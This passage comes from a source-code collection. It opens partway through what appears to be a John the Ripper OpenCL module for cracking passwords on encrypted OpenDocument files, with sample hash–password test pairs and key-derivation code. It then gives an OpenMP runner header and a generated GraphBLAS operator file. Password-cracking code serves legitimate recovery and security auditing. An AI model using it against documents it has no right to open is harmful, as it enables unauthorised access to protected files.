bf730998513837c96a121e4ad13af5030392ff7fb660955e03f65894733862f2367d529f0e8cdb73272b9ce01491747cb3e1a22f5c85ab6d40ddd35d15b9d46d73600e0971da90f93cb0e9be357c4f1227fbf5b123e5b", "jumper9"},
{"$odf$*0*0*1024*16*4ec0370ab589f943131240e407a35b58a341e052*8*19cadc01889f78c0*16*dcfcb8baccda277764e4e99833ab9640*0*a7bd859d68298fbdc36b6b51eb06f7055befe08f76ca9833c6e298db8ed971bfd1315065a19e1b31b8a93624757a2583816f35d6f251ff7943be626b3dc72f0b320c9ce5d80b7cc676aa02e6a4996abd752da573ecc339d2c80a2c8bfc28a9f4ceea51c2969adf20c8762b2ee0b1835bbd31bd90d5a638cfe523a596ea95feca64ae20010ad9957a724143e25a875f3cec3cedb4df1c16ac82b46b35db269da98270c813acd5e55a2c138306decdf96b1c1079d9cfd3704d519fbc5a4a547ba5286a7e80dc434f1bf34260433cbb79c4bcbb2a5bfc5a6c2430944ef2e34e7b9c76b21a97003c1fa85f6e9c4ed984108a7d301afe4a8f6625502a4bf17b24e009717c711571da2d6acd25868892bb9e29a77da8018222cd57c91d9aad96c954355e50a4760f08aa1f1b4257f7eb1a235c9234e8fc4ed97e8ad3e5d7d128807b726a4eb0038246d8580397c0ff5873d34b5a688a4a931be7c5737e5ada3e830b02d3efb075e338d71be55751a765a21d560933812856986a4d0d0a6d4954c50631fa3dff8565057149c4c4951858be4d5dca8e492093cfd88b56a19a161e7595e2e98764e91eb51c5289dc4efa65c7b207c517e269e3c699373fe1bf177c5d641cf2cfa4bd2afe8bff53a98b2d64bedc5a2e2f2973416c66791cf012696a0e95f7a4dadb86f925fc1943cb2b75fb3eda30f7779edff7cce95ae6f0f7b45ac207a4de4ec012a3654103136e11eb496276647d5e8f6e1659951fc7ef78d60e9430027e826f2aaab7c93ef58a5af47b92cec2f17903a26e2cc5d8d09b1db55e568bfb23a6b6b46125daf71a2f3a708676101d1b657cd38e81deb74d5d877b3321349cd667c29359b45b82218ad96f6c805ac3439fc63f0c91d66da36bae3f176c23b45b8ca1945fb4a4cea5c4a7b0f6ffd547614e7016f94d3e7889ccac868578ea779cd7e6b015aafd296dd5e2da2aa7e2f2af2ce6605f53613f069194dff35ffb9a2ebb30e011c26f669ededa2c91ffb06fedc44cf23f35d7d2716abcd50a8f561721d613d8f2c689ac245a5ac084fa86c72bbe80da7d508e63d891db528fa9e8f0d608034cd97dfde70f739857672e2d70070e850c3a6521067c1774244b86cca835ca8ff1748516e694ea2b5b42555f0df9cb9ec78825c351df51a76b6fe23b58ab3e87ba94ffbb98c9fa9d50c0c282ed0e506bcad24c02d8b625b4bdac822a9e5c911d095c5e4d3bf03448add978e0e7fab7f8a7008568f01a4f06f155223086bdcfe6879e76f199afb9caeadebaa9ec4ec8120f4ccfc4f5f7d7e3cc4dd0cba4d11546d8540030769c4b6d54abdd51fa1f30da642e5ff5c35d3e711c8931ff79e9f256ac6416e99943b0000bf32a5efdd5cf1cd668a62381febe959ca472be9c1a9bade59dbba07eb035ddb1e64ae2923bd276deed788db7600d776f49339215", "RickRoll"},
{"$odf$*0*0*1024*16*399a33262bbef99543bae29a6bb069c36e3a8f1b*8*6b721193b04fa933*16*99a6342ca7221c81890035dc5033c16f*0*ef8692296b67a8a77344e87b6193dc0a370b115d9e8c85e901c1a19d03ee2a34b7bf989bf9c2edab61022ea49f2a3ce5a6c807af374afd21b52ccbd0aa13784c73d2c8feda1fe0c8ebbb94e46e32904d95d1f135759e2733c2bd30b8cb0050c1cb8a2336c1151c498b9609547e96243aed9473e0901b55137ed78e2c6057e5826cfbfb94b0d77cb12b1fb6ac2752ea71c9c05cdb6a2f3d9611cb24f6e23065b408601518e3182ba1b8cef4cfcdf6ceecb2f33267cf733d3da715562e6977015b2b6423fb416781a1b6a67252eec46cda2741163f86273a68cd241a06263fdd8fc25f1c30fd4655724cc3e5c3d8f3e84abf446dd545155e440991c5fa613b7c18bd0dabd1ad45beb508cfb2b08d4337179cba63df5095b3d640eadbd72ca07f5c908241caf384ca268355c0d13471c241ea5569a5d04a9e3505883eb1c359099c1578e4bc33a73ba74ceb4a0520e0712e3c88582549a668a9c11b8680368cfbc3c5ec02663ddd97963d9dacefed89912ffa9cd945a8634a653296163bb873f3afd1d02449494fab168e7f652230c16d35853df1164219c04c4bd17954b85eb1939d87412eeeb2a039a8bb087178c03a9a40165a28a985e8bc443071b3764d846d342ca2073223f9809fe2ee3a1dfa65b9d897877ebb33a48a760c8fb32062b51a96421256a94896e93b41f559fdec7743680a8deacff9132d6129574d1a62be94308b195d06a275947a1455600030468dde53639fd239a8ab074ec1c7f661f2c9e8d60d6e0e743d351017d5c3d3be21b67d05310d0c5f3fd670acd95ca24f91b0d84d761d15259848f736ff08610e300c31b242f6d24ac2418cdd1fe0248f8a2a2f5775c08e5571c8d25d65ff573cc403ea9cad3bafd56c166fbcec9e64909df3c6ec8095088a8992493b7180c4dbb4053dcb55d9c5f46d728a97ae4ec7ac4b5941bcc3b64a4af31f7dc673e6715a52c9cdbe23dc21e51784f8314c019fc90e8612fcffe01d026fd9e15d1474e73dedf1d3830da81320097be6953173e4293372b5e5a8ecc49ac8b1a658cff16ffa04a8c1728d02ab67694170f10bc9030939ff6df3f901faa019d9b9fd2ba23e89eb0bbaf7a69a2272ee1df0403e6435aee147da217e8bf4c1ee5c53eb83aac1b3f8772d5cd2a2686f312ac4f4f2b0733593e28305a550dbbd18d3405a464ff20e0d9364cfe49b82a97ef7303aec92004a3476cf9ad012eaaf10fd07d3823e1b6871e82113ecfe4392854de9ab21ab1e33ce93d1abb07018007f50d641c8eb85b28fd335fd2281745772c98f8f0bba3f4d40ba602545ef8a0db3062f02d7ee5f49b42cbe19c0c2124952f98c49aff6927110314e54fe8d47a10f13d2d4055c1f3f2d679d4043c9b2f68b2220b6c6c738f6402c01d000c9394c8ed27e70c7ee6108d3e7e809777bab9be30b33a3fb83271cbf3b", "WhoCanItBeNow"},
{NULL}
};
static cl_int cl_error;
static odf_password *inbuffer;
static odf_hash *outbuffer;
static odf_salt currentsalt;
static cl_mem mem_in, mem_out, mem_setting;
static struct fmt_main *self;
size_t insize, outsize, settingsize, cracked_size;
#define STEP 0
#define SEED 256
// This file contains auto-tuning routine(s). Has to be included after formats definitions.
#include "opencl-autotune.h"
#include "memdbg.h"
static const char * warn[] = {
"xfer: ", ", crypt: ", ", xfer: "
};
/* ------- Helper functions ------- */
static size_t get_task_max_work_group_size()
{
return autotune_get_task_max_work_group_size(FALSE, 0, crypt_kernel);
}
static void create_clobj(size_t gws, struct fmt_main *self)
{
insize = sizeof(odf_password) * gws;
outsize = sizeof(odf_hash) * gws;
settingsize = sizeof(odf_salt);
cracked_size = sizeof(*crypt_out) * gws;
inbuffer = mem_calloc(1, insize);
outbuffer = mem_alloc(outsize);
saved_key = mem_calloc(gws, sizeof(*saved_key));
crypt_out = mem_calloc(1, cracked_size);
/// Allocate memory
mem_in =
clCreateBuffer(context[gpu_id], CL_MEM_READ_ONLY, insize, NULL,
&cl_error);
HANDLE_CLERROR(cl_error, "Error allocating mem in");
mem_setting =
clCreateBuffer(context[gpu_id], CL_MEM_READ_ONLY, settingsize,
NULL, &cl_error);
HANDLE_CLERROR(cl_error, "Error allocating mem setting");
mem_out =
clCreateBuffer(context[gpu_id], CL_MEM_WRITE_ONLY, outsize, NULL,
&cl_error);
HANDLE_CLERROR(cl_error, "Error allocating mem out");
HANDLE_CLERROR(clSetKernelArg(crypt_kernel, 0, sizeof(mem_in),
&mem_in), "Error while setting mem_in kernel argument");
HANDLE_CLERROR(clSetKernelArg(crypt_kernel, 1, sizeof(mem_out),
&mem_out), "Error while setting mem_out kernel argument");
HANDLE_CLERROR(clSetKernelArg(crypt_kernel, 2, sizeof(mem_setting),
&mem_setting), "Error while setting mem_salt kernel argument");
}
static void release_clobj(void)
{
if (crypt_out) {
HANDLE_CLERROR(clReleaseMemObject(mem_in), "Release mem in");
HANDLE_CLERROR(clReleaseMemObject(mem_setting), "Release mem setting");
HANDLE_CLERROR(clReleaseMemObject(mem_out), "Release mem out");
MEM_FREE(inbuffer);
MEM_FREE(outbuffer);
MEM_FREE(saved_key);
MEM_FREE(crypt_out);
}
}
static void done(void)
{
if (autotuned) {
release_clobj();
HANDLE_CLERROR(clReleaseKernel(crypt_kernel), "Release kernel");
HANDLE_CLERROR(clReleaseProgram(program[gpu_id]), "Release Program");
autotuned--;
}
}
static void init(struct fmt_main *_self)
{
self = _self;
opencl_prepare_dev(gpu_id);
}
static void reset(struct db_main *db)
{
if (!autotuned) {
char build_opts[64];
snprintf(build_opts, sizeof(build_opts),
"-DKEYLEN=%d -DSALTLEN=%d -DOUTLEN=%d",
(int)sizeof(inbuffer->v),
(int)sizeof(currentsalt.salt),
(int)sizeof(outbuffer->v));
opencl_init("$JOHN/kernels/pbkdf2_hmac_sha1_unsplit_kernel.cl",
gpu_id, build_opts);
crypt_kernel = clCreateKernel(program[gpu_id], "derive_key", &cl_error);
HANDLE_CLERROR(cl_error, "Error creating kernel");
// Initialize openCL tuning (library) for this format.
opencl_init_auto_setup(SEED, 0, NULL, warn, 1,
self, create_clobj, release_clobj,
sizeof(odf_password), 0, db);
// Auto tune execution from shared/included code.
autotune_run(self, 1, 0, 1000);
}
}
static int valid(char *ciphertext, struct fmt_main *self)
{
char *ctcopy;
char *keeptr;
char *p;
int res;
if (strncmp(ciphertext, "$odf$*", 6))
return 0;
/* handle 'chopped' .pot lines */
if (ldr_isa_pot_source(ciphertext))
return 1;
ctcopy = strdup(ciphertext);
keeptr = ctcopy;
ctcopy += 6;
if ((p = strtokm(ctcopy, "*")) == NULL) /* cipher type */
goto err;
res = atoi(p);
if (res != 0) {
goto err;
}
if ((p = strtokm(NULL, "*")) == NULL) /* checksum type */
goto err;
res = atoi(p);
if (res != 0 && res != 1)
goto err;
if ((p = strtokm(NULL, "*")) == NULL) /* iterations */
goto err;
if ((p = strtokm(NULL, "*")) == NULL) /* key size */
goto err;
res = atoi(p);
if (res != 16 && res != 32)
goto err;
if ((p = strtokm(NULL, "*")) == NULL) /* checksum field (skipped) */
goto err;
//if (hexlenl(p) != res) // Hmm. res==16, length of p == 40??? Not sure about this one.
// goto err;
if (!ishexlc(p))
goto err;
if ((p = strtokm(NULL, "*")) == NULL) /* iv length */
goto err;
res = atoi(p);
if (res > 16)
goto err;
if ((p = strtokm(NULL, "*")) == NULL) /* iv */
goto err;
if (hexlenl(p) != res * 2)
goto err;
if ((p = strtokm(NULL, "*")) == NULL) /* salt length */
goto err;
res = atoi(p);
if (res > 32)
goto err;
if ((p = strtokm(NULL, "*")) == NULL) /* salt */
goto err;
if (hexlenl(p) != res * 2)
goto err;
if ((p = strtokm(NULL, "*")) == NULL) /* something */
goto err;
if ((p = strtokm(NULL, "*")) == NULL) /* content */
goto err;
res = strlen(p);
if (res > 2048 || res & 1)
goto err;
if (!ishexlc(p))
goto err;
MEM_FREE(keeptr);
return 1;
err:
MEM_FREE(keeptr);
return 0;
}
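/*
 * Field layout of an ODF hash line, as enforced by valid() above:
 *   $odf$*cipher(0)*checksum(0|1)*iterations*keysize(16|32)*checksum-hex*
 *   iv-len*iv-hex*salt-len*salt-hex*unused*content-hex
 */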
static void *get_salt(char *ciphertext)
{
char *ctcopy = strdup(ciphertext);
char *keeptr = ctcopy;
int i;
char *p;
static odf_cpu_salt cs;
ctcopy += 6; /* skip over "$odf$*" */
p = strtokm(ctcopy, "*");
cs.cipher_type = atoi(p);
p = strtokm(NULL, "*");
cs.checksum_type = atoi(p);
p = strtokm(NULL, "*");
cs.iterations = atoi(p);
p = strtokm(NULL, "*");
cs.key_size = atoi(p);
p = strtokm(NULL, "*");
/* skip checksum field */
p = strtokm(NULL, "*");
cs.iv_length = atoi(p);
p = strtokm(NULL, "*");
for (i = 0; i < cs.iv_length; i++)
cs.iv[i] = atoi16[ARCH_INDEX(p[i * 2])] * 16
+ atoi16[ARCH_INDEX(p[i * 2 + 1])];
p = strtokm(NULL, "*");
cs.salt_length = atoi(p);
p = strtokm(NULL, "*");
for (i = 0; i < cs.salt_length; i++)
cs.salt[i] = atoi16[ARCH_INDEX(p[i * 2])] * 16
+ atoi16[ARCH_INDEX(p[i * 2 + 1])];
p = strtokm(NULL, "*");
p = strtokm(NULL, "*");
memset(cs.content, 0, sizeof(cs.content));
for (i = 0; p[i * 2] && i < 1024; i++)
cs.content[i] = atoi16[ARCH_INDEX(p[i * 2])] * 16
+ atoi16[ARCH_INDEX(p[i * 2 + 1])];
cs.content_length = i;
MEM_FREE(keeptr);
return (void *)&cs;
}
static void *get_binary(char *ciphertext)
{
static union {
unsigned char c[BINARY_SIZE+1];
ARCH_WORD dummy;
} buf;
unsigned char *out = buf.c;
char *p;
int i;
char *ctcopy = strdup(ciphertext);
char *keeptr = ctcopy;
ctcopy += 6; /* skip over "$odf$*" */
strtokm(ctcopy, "*");
strtokm(NULL, "*");
strtokm(NULL, "*");
strtokm(NULL, "*");
p = strtokm(NULL, "*");
for (i = 0; i < BINARY_SIZE; i++) {
out[i] =
(atoi16[ARCH_INDEX(*p)] << 4) |
atoi16[ARCH_INDEX(p[1])];
p += 2;
}
MEM_FREE(keeptr);
return out;
}
static void set_salt(void *salt)
{
cur_salt = (odf_cpu_salt*)salt;
memcpy((char*)currentsalt.salt, cur_salt->salt, cur_salt->salt_length);
currentsalt.length = cur_salt->salt_length;
currentsalt.iterations = cur_salt->iterations;
currentsalt.outlen = cur_salt->key_size;
currentsalt.skip_bytes = 0;
HANDLE_CLERROR(clEnqueueWriteBuffer(queue[gpu_id], mem_setting,
CL_FALSE, 0, settingsize, &currentsalt, 0, NULL, NULL),
"Copy salt to gpu");
}
static int get_hash_0(int index) { return crypt_out[index][0] & PH_MASK_0; }
static int get_hash_1(int index) { return crypt_out[index][0] & PH_MASK_1; }
static int get_hash_2(int index) { return crypt_out[index][0] & PH_MASK_2; }
static int get_hash_3(int index) { return crypt_out[index][0] & PH_MASK_3; }
static int get_hash_4(int index) { return crypt_out[index][0] & PH_MASK_4; }
static int get_hash_5(int index) { return crypt_out[index][0] & PH_MASK_5; }
static int get_hash_6(int index) { return crypt_out[index][0] & PH_MASK_6; }
#undef set_key
static void set_key(char *key, int index)
{
int saved_len = strlen(key);
if (saved_len > PLAINTEXT_LENGTH)
saved_len = PLAINTEXT_LENGTH;
memcpy(saved_key[index], key, saved_len);
saved_key[index][saved_len] = 0;
}
static char *get_key(int index)
{
return saved_key[index];
}
static int crypt_all(int *pcount, struct db_salt *salt)
{
const int count = *pcount;
int index;
size_t *lws = local_work_size ? &local_work_size : NULL;
global_work_size = GET_MULTIPLE_OR_BIGGER(count, local_work_size);
#ifdef _OPENMP
#pragma omp parallel for
#endif
for(index = 0; index < count; index++)
{
unsigned char hash[20];
SHA_CTX ctx;
SHA1_Init(&ctx);
SHA1_Update(&ctx, (unsigned char *)saved_key[index], strlen(saved_key[index]));
SHA1_Final((unsigned char *)hash, &ctx);
memcpy(inbuffer[index].v, hash, 20);
inbuffer[index].length = 20;
}
/// Copy data to gpu
BENCH_CLERROR(clEnqueueWriteBuffer(queue[gpu_id], mem_in, CL_FALSE, 0,
insize, inbuffer, 0, NULL, multi_profilingEvent[0]),
"Copy data to gpu");
/// Run kernel
BENCH_CLERROR(clEnqueueNDRangeKernel(queue[gpu_id], crypt_kernel, 1,
NULL, &global_work_size, lws, 0, NULL,
multi_profilingEvent[1]), "Run kernel");
/// Read the result back
BENCH_CLERROR(clEnqueueReadBuffer(queue[gpu_id], mem_out, CL_TRUE, 0,
outsize, outbuffer, 0, NULL, multi_profilingEvent[2]), "Copy result back");
if (ocl_autotune_running)
return count;
#ifdef _OPENMP
#pragma omp parallel for
#endif
for(index = 0; index < count; index++)
{
BF_KEY bf_key;
SHA_CTX ctx;
int bf_ivec_pos;
unsigned char ivec[8];
unsigned char output[1024];
bf_ivec_pos = 0;
memcpy(ivec, cur_salt->iv, 8);
BF_set_key(&bf_key, cur_salt->key_size, (unsigned char*)outbuffer[index].v);
BF_cfb64_encrypt(cur_salt->content, output, cur_salt->content_length, &bf_key, ivec, &bf_ivec_pos, 0);
SHA1_Init(&ctx);
SHA1_Update(&ctx, output, cur_salt->content_length);
SHA1_Final((unsigned char*)crypt_out[index], &ctx);
}
return count;
}
static int cmp_all(void *binary, int count)
{
int index = 0;
for (; index < count; index++)
if (!memcmp(binary, crypt_out[index], ARCH_SIZE))
return 1;
return 0;
}
static int cmp_one(void *binary, int index)
{
return !memcmp(binary, crypt_out[index], BINARY_SIZE);
}
static int cmp_exact(char *source, int index)
{
return 1;
}
struct fmt_main fmt_opencl_odf = {
{
FORMAT_LABEL,
FORMAT_NAME,
ALGORITHM_NAME,
BENCHMARK_COMMENT,
BENCHMARK_LENGTH,
0,
PLAINTEXT_LENGTH,
BINARY_SIZE,
BINARY_ALIGN,
SALT_SIZE,
SALT_ALIGN,
MIN_KEYS_PER_CRYPT,
MAX_KEYS_PER_CRYPT,
FMT_CASE | FMT_8_BIT | FMT_OMP,
{ NULL },
odf_tests
}, {
init,
done,
reset,
fmt_default_prepare,
valid,
fmt_default_split,
get_binary,
get_salt,
{ NULL },
fmt_default_source,
{
fmt_default_binary_hash_0,
fmt_default_binary_hash_1,
fmt_default_binary_hash_2,
fmt_default_binary_hash_3,
fmt_default_binary_hash_4,
fmt_default_binary_hash_5,
fmt_default_binary_hash_6
},
fmt_default_salt_hash,
NULL,
set_salt,
set_key,
get_key,
fmt_default_clear_keys,
crypt_all,
{
get_hash_0,
get_hash_1,
get_hash_2,
get_hash_3,
get_hash_4,
get_hash_5,
get_hash_6
},
cmp_all,
cmp_one,
cmp_exact
}
};
#endif /* plugin stanza */
#endif /* HAVE_OPENCL */
|
runner_openmp.h | //#include <omp.h>
/*
template<typename ...Args>
void Runner<Args...>::run_openmp()
{
//TODO enable openmp
#pragma omp parallel for
for(int i =0; i < N;++i)
{
global_id = i;
run_cpu();
}
}
*/
void run_openmp()
{
#pragma omp parallel for
for(int i =0; i < N;++i)
{
//global_id = i;
global_ids[omp_get_thread_num()] = i;
run_cpu();
}
}
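/* Worked example of the device/CPU split computed in run_hybrid() below,
   assuming hybrid_scale = 30 and N = 1000: the device receives
   clrunner.N = min(1000, multiple_of_local((1000*30 + 99) / 100))
             = min(1000, multiple_of_local(300)) iterations,
   and the remaining leftover = N - clrunner.N iterations run on the CPU. */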
void run_hybrid() {
int scale = hybrid_scale;
int downscale = 100;
auto clrunner = Runner(*this);
debug_printf("post copy");
clrunner.N = std::min(N,multiple_of_local((N*scale+downscale-1)/downscale));
debug_printf("clrunner.N = %i", clrunner.N);
int leftover = N-clrunner.N;
for(size_t i = 0; i < sizeof...(Args); ++i)
{
if(read_mem[i]) {
if(clrunner.sizes[i] == N) {
clrunner.sizes[i] = std::min(clrunner.sizes[i],clrunner.N);
}
else {
throw std::runtime_error("wrong read mem size for hybrid");
}
}
}
clrunner.load_opencl();
#pragma omp parallel for
for(int i =0; i < leftover+1;++i)
{
global_ids[omp_get_thread_num()] = clrunner.N-1+i;
if(i==0){
// the in-loop OpenCL launch/wait is currently disabled; the device
// work is awaited once after the loop instead
//clrunner.wait_opencl();
//clrunner.run_opencl();
}
else {
run_cpu();
}
}
clrunner.wait_opencl();
}
|
GB_binop__second_int8.c | //------------------------------------------------------------------------------
// GB_binop: hard-coded functions for each built-in binary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2021, All Rights Reserved.
// SPDX-License-Identifier: Apache-2.0
//------------------------------------------------------------------------------
// If this file is in the Generated2/ folder, do not edit it
// (it is auto-generated from Generator/*).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_emult.h"
#include "GB_control.h"
#include "GB_ek_slice.h"
#include "GB_dense.h"
#include "GB_atomics.h"
#include "GB_bitmap_assign_methods.h"
#include "GB_binop__include.h"
// C=binop(A,B) is defined by the following types and operators:
// A+B function (eWiseAdd): GB (_AaddB__second_int8)
// A.*B function (eWiseMult): GB (_AemultB_01__second_int8)
// A.*B function (eWiseMult): GB (_AemultB_02__second_int8)
// A.*B function (eWiseMult): GB (_AemultB_03__second_int8)
// A.*B function (eWiseMult): GB (_AemultB_bitmap__second_int8)
// A*D function (colscale): GB (_AxD__second_int8)
// D*A function (rowscale): GB (_DxB__second_int8)
// C+=B function (dense accum): GB (_Cdense_accumB__second_int8)
// C+=b function (dense accum): GB (_Cdense_accumb__second_int8)
// C+=A+B function (dense ewise3): GB ((none))
// C=A+B function (dense ewise3): GB (_Cdense_ewise3_noaccum__second_int8)
// C=scalar+B GB ((none))
// C=scalar+B' GB ((none))
// C=A+scalar GB ((none))
// C=A'+scalar GB ((none))
// C type: int8_t
// A type: int8_t
// B,b type: int8_t
// BinaryOp: cij = bij
#define GB_ATYPE \
int8_t
#define GB_BTYPE \
int8_t
#define GB_CTYPE \
int8_t
// true if the types of A and B are identical
#define GB_ATYPE_IS_BTYPE \
1
// true if the types of C and A are identical
#define GB_CTYPE_IS_ATYPE \
1
// true if the types of C and B are identical
#define GB_CTYPE_IS_BTYPE \
1
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA,A_iso) \
;
// bij = Bx [pB]
#define GB_GETB(bij,Bx,pB,B_iso) \
int8_t bij = GBX (Bx, pB, B_iso)
// declare scalar of the same type as C
#define GB_CTYPE_SCALAR(t) \
int8_t t
// cij = Ax [pA]
#define GB_COPY_A_TO_C(cij,Ax,pA,A_iso) \
cij = GBX (Ax, pA, A_iso)
// cij = Bx [pB]
#define GB_COPY_B_TO_C(cij,Bx,pB,B_iso) \
cij = GBX (Bx, pB, B_iso)
#define GB_CX(p) Cx [p]
// binary operator
#define GB_BINOP(z,x,y,i,j) \
z = y ;
// true if the binop must be flipped
#define GB_BINOP_FLIP \
0
// op is second
#define GB_OP_IS_SECOND \
1
// do the numerical phases of GB_add and GB_emult
#define GB_PHASE_2_OF_2
// hard-coded loops can be vectorized
#define GB_PRAGMA_SIMD_VECTORIZE GB_PRAGMA_SIMD
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_SECOND || GxB_NO_INT8 || GxB_NO_SECOND_INT8)
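// Illustration of the SECOND operator (cij = bij): wherever A and B are
// both present, the entry of B wins, e.g. A(3,1)=7 and B(3,1)=5 give
// C(3,1)=5 for eWiseMult; A's values are never read (GB_GETA is empty).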
//------------------------------------------------------------------------------
// C += A+B, all 3 matrices dense
//------------------------------------------------------------------------------
#if 0
// The op must be MIN, MAX, PLUS, MINUS, RMINUS, TIMES, DIV, or RDIV.
void GB ((none))
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix B,
const int nthreads
)
{
#include "GB_dense_ewise3_accum_template.c"
}
#endif
//------------------------------------------------------------------------------
// C = A+B, all 3 matrices dense
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_ewise3_noaccum__second_int8)
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix B,
const int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_dense_ewise3_noaccum_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C += B, accumulate a sparse matrix into a dense matrix
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_accumB__second_int8)
(
GrB_Matrix C,
const GrB_Matrix B,
const int64_t *B_ek_slicing, const int B_ntasks, const int B_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
{
#include "GB_dense_subassign_23_template.c"
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C += b, accumulate a scalar into a dense matrix
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_accumb__second_int8)
(
GrB_Matrix C,
const GB_void *p_bwork,
const int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
{
// get the scalar b for C += b, of type int8_t
int8_t bwork = (*((int8_t *) p_bwork)) ;
#include "GB_dense_subassign_22_template.c"
return (GrB_SUCCESS) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = A*D, column scale with diagonal D matrix
//------------------------------------------------------------------------------
GrB_Info GB (_AxD__second_int8)
(
GrB_Matrix C,
const GrB_Matrix A, bool A_is_pattern,
const GrB_Matrix D, bool D_is_pattern,
const int64_t *A_ek_slicing, const int A_ntasks, const int A_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int8_t *restrict Cx = (int8_t *) C->x ;
#include "GB_AxB_colscale_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = D*B, row scale with diagonal D matrix
//------------------------------------------------------------------------------
GrB_Info GB (_DxB__second_int8)
(
GrB_Matrix C,
const GrB_Matrix D, bool D_is_pattern,
const GrB_Matrix B, bool B_is_pattern,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int8_t *restrict Cx = (int8_t *) C->x ;
#include "GB_AxB_rowscale_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseAdd: C = A+B or C<M> = A+B
//------------------------------------------------------------------------------
GrB_Info GB (_AaddB__second_int8)
(
GrB_Matrix C,
const int C_sparsity,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const bool Ch_is_Mh,
const int64_t *restrict C_to_M,
const int64_t *restrict C_to_A,
const int64_t *restrict C_to_B,
const GB_task_struct *restrict TaskList,
const int C_ntasks,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
GB_WERK_DECLARE (M_ek_slicing, int64_t) ;
GB_WERK_DECLARE (A_ek_slicing, int64_t) ;
GB_WERK_DECLARE (B_ek_slicing, int64_t) ;
#include "GB_add_template.c"
GB_FREE_WORK ;
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C = A.*B or C<M> = A.*B
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_01__second_int8)
(
GrB_Matrix C,
const int C_sparsity,
const int ewise_method,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *restrict C_to_M,
const int64_t *restrict C_to_A,
const int64_t *restrict C_to_B,
const GB_task_struct *restrict TaskList,
const int C_ntasks,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_emult_01_meta.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C<#> = A.*B when A is sparse/hyper and B is bitmap/full
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_02__second_int8)
(
GrB_Matrix C,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const bool flipxy,
const int64_t *restrict Cp_kfirst,
const int64_t *A_ek_slicing, const int A_ntasks, const int A_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#if GB_BINOP_FLIP
// The operator is not commutative, and does not have a flipped
// variant. For example z=atan2(y,x).
if (flipxy)
{
// use fmult(y,x)
#undef GB_FLIPPED
#define GB_FLIPPED 1
#include "GB_emult_02_template.c"
}
else
{
// use fmult(x,y)
#undef GB_FLIPPED
#define GB_FLIPPED 0
#include "GB_emult_02_template.c"
}
#else
// No need to handle the flip: the operator is either commutative, or
// has been handled by changing z=div(y,x) to z=rdiv(x,y) for example.
#undef GB_FLIPPED
#define GB_FLIPPED 0
#include "GB_emult_02_template.c"
#endif
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C<M> = A.*B, M sparse/hyper, A and B bitmap/full
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_03__second_int8)
(
GrB_Matrix C,
const GrB_Matrix M,
const bool Mask_struct,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *restrict Cp_kfirst,
const int64_t *M_ek_slicing, const int M_ntasks, const int M_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_emult_03_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C=A.*B, C<M>=A.*B, C<!M>=A.*B where C is bitmap
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_bitmap__second_int8)
(
GrB_Matrix C,
const int ewise_method,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *M_ek_slicing, const int M_ntasks, const int M_nthreads,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_bitmap_emult_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// Cx = op (x,Bx): apply a binary operator to a matrix with scalar bind1st
//------------------------------------------------------------------------------
#if 0
GrB_Info GB ((none))
(
GB_void *Cx_output, // Cx and Bx may be aliased
const GB_void *x_input,
const GB_void *Bx_input,
const int8_t *restrict Bb,
int64_t bnz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int8_t *Cx = (int8_t *) Cx_output ;
int8_t x = (*((int8_t *) x_input)) ;
int8_t *Bx = (int8_t *) Bx_input ;
int64_t p ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < bnz ; p++)
{
if (!GBB (Bb, p)) continue ;
int8_t bij = GBX (Bx, p, false) ;
Cx [p] = bij ;
}
return (GrB_SUCCESS) ;
#endif
}
#endif
//------------------------------------------------------------------------------
